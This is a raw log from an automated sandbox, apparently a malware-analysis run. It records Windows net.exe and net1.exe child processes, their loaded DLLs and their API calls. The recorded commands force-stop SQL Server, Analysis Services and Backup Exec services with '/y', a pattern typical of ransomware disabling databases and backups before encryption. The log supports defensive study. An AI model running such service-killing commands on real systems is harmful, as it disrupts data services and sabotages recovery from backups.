0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7346 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7347 start_va = 0xff380000 end_va = 0xff3b2fff entry_point = 0xff380000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7348 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7349 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7350 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 7351 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7352 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 7353 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7354 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7370 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7371 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7372 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7373 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 7374 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 7375 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7376 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7377 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7378 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7379 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7380 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7381 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7382 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7383 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7384 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7385 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7386 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7387 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7388 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7389 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7390 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7391 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7392 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7393 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 616 os_tid = 0x330 [0102.593] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfc30 | out: lpSystemTimeAsFileTime=0x1cfc30*(dwLowDateTime=0xf251d5f0, dwHighDateTime=0x1d48689)) [0102.593] GetCurrentProcessId () returned 0x8dc [0102.594] GetCurrentThreadId () returned 0x330 [0102.594] GetTickCount () returned 0x236a9 [0102.594] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfc38 | out: lpPerformanceCount=0x1cfc38*=1814951200000) returned 1 [0102.595] GetModuleHandleW (lpModuleName=0x0) returned 0xff380000 [0102.595] __set_app_type (_Type=0x1) [0102.595] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff399c9c) returned 0x0 [0102.595] __getmainargs (in: _Argc=0xff3a4780, _Argv=0xff3a4790, _Env=0xff3a4788, _DoWildCard=0, _StartInfo=0xff3a479c | out: _Argc=0xff3a4780, _Argv=0xff3a4790, _Env=0xff3a4788) returned 0 [0102.595] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0102.595] GetConsoleOutputCP () returned 0x1b5 [0102.595] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3acec0 | out: lpCPInfo=0xff3acec0) returned 1 [0102.595] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0102.597] sprintf_s (in: _DstBuf=0x1cfbd8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0102.597] setlocale (category=0, locale=".437") returned="English_United States.437" [0102.598] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0102.598] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0102.598] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$TPSAMA /y" [0102.598] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0102.598] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0102.599] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfbc8 | out: Buffer=0x1cfbc8*=0x1f4d50) returned 0x0 [0102.599] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfbc8 | out: Buffer=0x1cfbc8*=0x1fc100) returned 0x0 [0102.599] _fileno (_File=0x7fefdba2a80) returned 0 [0102.599] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0102.599] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0102.599] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0102.599] _wcsicmp (_String1="config", _String2="stop") returned -16 [0102.599] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0102.599] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0102.599] _wcsicmp (_String1="file", _String2="stop") returned -13 [0102.599] _wcsicmp (_String1="files", _String2="stop") returned -13 [0102.599] _wcsicmp (_String1="group", _String2="stop") returned -12 [0102.599] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0102.599] _wcsicmp (_String1="help", _String2="stop") returned -11 [0102.599] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0102.599] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0102.599] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0102.599] _wcsicmp (_String1="session", _String2="stop") returned -15 [0102.599] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0102.599] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0102.599] _wcsicmp (_String1="share", _String2="stop") returned -12 [0102.600] _wcsicmp (_String1="start", _String2="stop") returned -14 [0102.600] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0102.600] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0102.600] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0102.600] _wcsicmp (_String1="accounts", _String2="MSOLAP$TPSAMA") returned -12 [0102.600] _wcsicmp (_String1="computer", _String2="MSOLAP$TPSAMA") returned -10 [0102.600] _wcsicmp (_String1="config", _String2="MSOLAP$TPSAMA") returned -10 [0102.600] _wcsicmp (_String1="continue", _String2="MSOLAP$TPSAMA") returned -10 [0102.600] _wcsicmp (_String1="cont", _String2="MSOLAP$TPSAMA") returned -10 [0102.600] _wcsicmp (_String1="file", _String2="MSOLAP$TPSAMA") returned -7 [0102.600] _wcsicmp (_String1="files", _String2="MSOLAP$TPSAMA") returned -7 [0102.600] _wcsicmp (_String1="group", _String2="MSOLAP$TPSAMA") returned -6 [0102.600] _wcsicmp (_String1="groups", _String2="MSOLAP$TPSAMA") returned -6 [0102.600] _wcsicmp (_String1="help", _String2="MSOLAP$TPSAMA") returned -5 [0102.600] _wcsicmp (_String1="helpmsg", _String2="MSOLAP$TPSAMA") returned -5 [0102.600] _wcsicmp (_String1="localgroup", _String2="MSOLAP$TPSAMA") returned -1 [0102.600] _wcsicmp (_String1="pause", _String2="MSOLAP$TPSAMA") returned 3 [0102.600] _wcsicmp (_String1="session", _String2="MSOLAP$TPSAMA") returned 6 [0102.600] _wcsicmp (_String1="sessions", _String2="MSOLAP$TPSAMA") returned 6 [0102.600] _wcsicmp (_String1="sess", _String2="MSOLAP$TPSAMA") returned 6 [0102.600] _wcsicmp (_String1="share", _String2="MSOLAP$TPSAMA") returned 6 [0102.600] _wcsicmp (_String1="start", _String2="MSOLAP$TPSAMA") returned 6 [0102.600] _wcsicmp (_String1="stats", _String2="MSOLAP$TPSAMA") returned 6 [0102.600] _wcsicmp (_String1="statistics", _String2="MSOLAP$TPSAMA") returned 6 [0102.600] _wcsicmp (_String1="stop", _String2="MSOLAP$TPSAMA") returned 6 [0102.600] _wcsicmp (_String1="time", _String2="MSOLAP$TPSAMA") returned 7 [0102.600] _wcsicmp (_String1="user", _String2="MSOLAP$TPSAMA") returned 8 [0102.600] _wcsicmp (_String1="users", _String2="MSOLAP$TPSAMA") returned 8 [0102.600] _wcsicmp (_String1="msg", _String2="MSOLAP$TPSAMA") returned -8 [0102.601] _wcsicmp (_String1="messenger", _String2="MSOLAP$TPSAMA") returned -14 [0102.601] _wcsicmp (_String1="receiver", _String2="MSOLAP$TPSAMA") returned 5 [0102.601] _wcsicmp (_String1="rcv", _String2="MSOLAP$TPSAMA") returned 5 [0102.601] _wcsicmp (_String1="netpopup", _String2="MSOLAP$TPSAMA") returned 1 [0102.601] _wcsicmp (_String1="redirector", _String2="MSOLAP$TPSAMA") returned 5 [0102.601] _wcsicmp (_String1="redir", _String2="MSOLAP$TPSAMA") returned 5 [0102.601] _wcsicmp (_String1="rdr", _String2="MSOLAP$TPSAMA") returned 5 [0102.601] _wcsicmp (_String1="workstation", _String2="MSOLAP$TPSAMA") returned 10 [0102.601] _wcsicmp (_String1="work", _String2="MSOLAP$TPSAMA") returned 10 [0102.601] _wcsicmp (_String1="wksta", _String2="MSOLAP$TPSAMA") returned 10 [0102.601] _wcsicmp (_String1="prdr", _String2="MSOLAP$TPSAMA") returned 3 [0102.601] _wcsicmp (_String1="devrdr", _String2="MSOLAP$TPSAMA") returned -9 [0102.601] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$TPSAMA") returned -1 [0102.601] _wcsicmp (_String1="server", _String2="MSOLAP$TPSAMA") returned 6 [0102.601] _wcsicmp (_String1="svr", _String2="MSOLAP$TPSAMA") returned 6 [0102.601] _wcsicmp (_String1="srv", _String2="MSOLAP$TPSAMA") returned 6 [0102.601] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$TPSAMA") returned -1 [0102.601] _wcsicmp (_String1="alerter", _String2="MSOLAP$TPSAMA") returned -12 [0102.601] _wcsicmp (_String1="netlogon", _String2="MSOLAP$TPSAMA") returned 1 [0102.601] _wcsupr (in: _String="MSOLAP$TPSAMA" | out: _String="MSOLAP$TPSAMA") returned="MSOLAP$TPSAMA" [0102.601] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1fce10 [0102.605] GetServiceKeyNameW (in: hSCManager=0x1fce10, lpDisplayName="MSOLAP$TPSAMA", lpServiceName=0xff3a5750, lpcchBuffer=0x1cfae8 | out: lpServiceName="", lpcchBuffer=0x1cfae8) returned 0 [0102.606] _wcsicmp (_String1="msg", _String2="MSOLAP$TPSAMA") returned -8 [0102.606] _wcsicmp (_String1="messenger", _String2="MSOLAP$TPSAMA") returned -14 [0102.607] _wcsicmp (_String1="receiver", _String2="MSOLAP$TPSAMA") returned 5 [0102.607] _wcsicmp (_String1="rcv", _String2="MSOLAP$TPSAMA") returned 5 [0102.607] _wcsicmp (_String1="redirector", _String2="MSOLAP$TPSAMA") returned 5 [0102.607] _wcsicmp (_String1="redir", _String2="MSOLAP$TPSAMA") returned 5 [0102.607] _wcsicmp (_String1="rdr", _String2="MSOLAP$TPSAMA") returned 5 [0102.607] _wcsicmp (_String1="workstation", _String2="MSOLAP$TPSAMA") returned 10 [0102.607] _wcsicmp (_String1="work", _String2="MSOLAP$TPSAMA") returned 10 [0102.607] _wcsicmp (_String1="wksta", _String2="MSOLAP$TPSAMA") returned 10 [0102.607] _wcsicmp (_String1="prdr", _String2="MSOLAP$TPSAMA") returned 3 [0102.607] _wcsicmp (_String1="devrdr", _String2="MSOLAP$TPSAMA") returned -9 [0102.607] _wcsicmp (_String1="lanmanworkstation", _String2="MSOLAP$TPSAMA") returned -1 [0102.607] _wcsicmp (_String1="server", _String2="MSOLAP$TPSAMA") returned 6 [0102.607] _wcsicmp (_String1="svr", _String2="MSOLAP$TPSAMA") returned 6 [0102.607] _wcsicmp (_String1="srv", _String2="MSOLAP$TPSAMA") returned 6 [0102.607] _wcsicmp (_String1="lanmanserver", _String2="MSOLAP$TPSAMA") returned -1 [0102.607] _wcsicmp (_String1="alerter", _String2="MSOLAP$TPSAMA") returned -12 [0102.607] _wcsicmp (_String1="netlogon", _String2="MSOLAP$TPSAMA") returned 1 [0102.607] NetServiceControl (in: servername=0x0, service="MSOLAP$TPSAMA", opcode=0x0, arg=0x0, bufptr=0x1cfaf0 | out: bufptr=0x1cfaf0) returned 0x889 [0102.609] wcscpy_s (in: _Destination=0xff3a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0102.609] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0102.610] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3a5b50, nSize=0x800, Arguments=0xff3a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0102.611] GetFileType (hFile=0xb) returned 0x2 [0102.612] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf9b8 | out: lpMode=0x1cf9b8) returned 1 [0102.612] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cf9b0, lpReserved=0x0 | out: lpBuffer=0xff3a5b50*, lpNumberOfCharsWritten=0x1cf9b0*=0x1e) returned 1 [0102.612] GetFileType (hFile=0xb) returned 0x2 [0102.612] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf9b8 | out: lpMode=0x1cf9b8) returned 1 [0102.613] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff381efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf9b0, lpReserved=0x0 | out: lpBuffer=0xff381efc*, lpNumberOfCharsWritten=0x1cf9b0*=0x2) returned 1 [0102.613] _ultow (in: _Dest=0x889, _Radix=1899040 | out: _Dest=0x889) returned="2185" [0102.613] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3a5b50, nSize=0x800, Arguments=0xff3a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0102.613] GetFileType (hFile=0xb) returned 0x2 [0102.613] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf9b8 | out: lpMode=0x1cf9b8) returned 1 [0102.613] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cf9b0, lpReserved=0x0 | out: lpBuffer=0xff3a5b50*, lpNumberOfCharsWritten=0x1cf9b0*=0x34) returned 1 [0102.614] GetFileType (hFile=0xb) returned 0x2 [0102.614] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf9b8 | out: lpMode=0x1cf9b8) returned 1 [0102.614] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff381efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf9b0, lpReserved=0x0 | out: lpBuffer=0xff381efc*, lpNumberOfCharsWritten=0x1cf9b0*=0x2) returned 1 [0102.615] NetApiBufferFree (Buffer=0x1f4d50) returned 0x0 [0102.615] NetApiBufferFree (Buffer=0x1fc100) returned 0x0 [0102.615] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$TPSAMA /y" [0102.615] exit (_Code=2) Process: id = "178" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x572e8000" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$PRACTTICEBGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7355 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7356 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7357 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7358 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 7359 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7360 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7361 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7362 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7363 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7364 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7365 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 7366 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7367 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7368 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7369 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7502 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7503 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7504 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7505 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 7506 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 7507 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7508 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7509 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 7510 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 7511 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7512 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7513 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7514 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7515 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7516 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7517 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7518 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7519 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7520 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7521 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 617 os_tid = 0x764 Process: id = "179" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x595de000" os_pid = "0xb78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "171" os_parent_pid = "0x121c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$BKUPEXEC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7394 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7395 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7396 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7397 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 7398 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7399 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 